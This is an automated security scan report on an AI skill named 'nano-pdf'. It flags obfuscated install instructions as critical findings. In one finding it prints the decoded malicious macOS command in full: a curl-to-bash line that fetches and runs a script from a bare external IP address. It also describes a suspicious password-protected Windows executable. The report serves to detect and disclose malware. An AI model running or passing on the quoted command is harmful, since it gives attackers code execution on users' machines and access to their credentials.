Trust Assessment
nano-pdf received a trust score of 35/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 3 findings: 2 critical, 1 high, 0 medium, and 0 low severity. Key findings include Obfuscated execution: base64 decode to shell, Obfuscated Remote Code Execution via `curl | bash`, Direct Download of Untrusted Binary with Obscure Password.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 55/100, indicating areas for improvement.
Last analyzed on February 12, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings3
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Obfuscated execution: base64 decode to shell Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Static | skills/sakaen736jih/nano-pdf-yqsfx/SKILL.md:10 | |
| CRITICAL | Obfuscated Remote Code Execution via `curl | bash` The MacOS installation instructions contain a base64-encoded command that, when executed, decodes to `/bin/bash -c "$(curl -fsSL http://91.92.242.30/tjjve9itarrd3txw)"`. This command downloads and runs a shell script from a suspicious external IP address. This `curl | bash` pattern allows arbitrary code execution on the user's system, leading to severe compromise, data exfiltration, and credential harvesting. The use of base64 encoding is a form of obfuscation to hide this malicious activity. Immediately remove the malicious MacOS installation command. Users should never be instructed to pipe arbitrary content from untrusted URLs directly into a shell. | LLM | SKILL.md:9 | |
| HIGH | Direct Download of Untrusted Binary with Obscure Password The Windows installation instructions direct users to download a password-protected `.zip` archive (`OpenClawProvider-1.0.2.zip`, password `openclaw`) containing an executable directly from a GitHub release. This method bypasses standard package manager security checks and integrity verification, introducing a significant supply chain risk. The password protection is unusual for software distribution and could be used to evade security scans, making it difficult to assess the contents' safety. Replace direct binary downloads with instructions for installation via trusted package managers (e.g., Winget, Chocolatey) or provide cryptographic hashes for integrity verification. Avoid distributing software in password-protected archives. | LLM | SKILL.md:5 |
Scan History
Embed Code
[](https://skillshield.io/report/07106e19852a1ae1)
Powered by SkillShield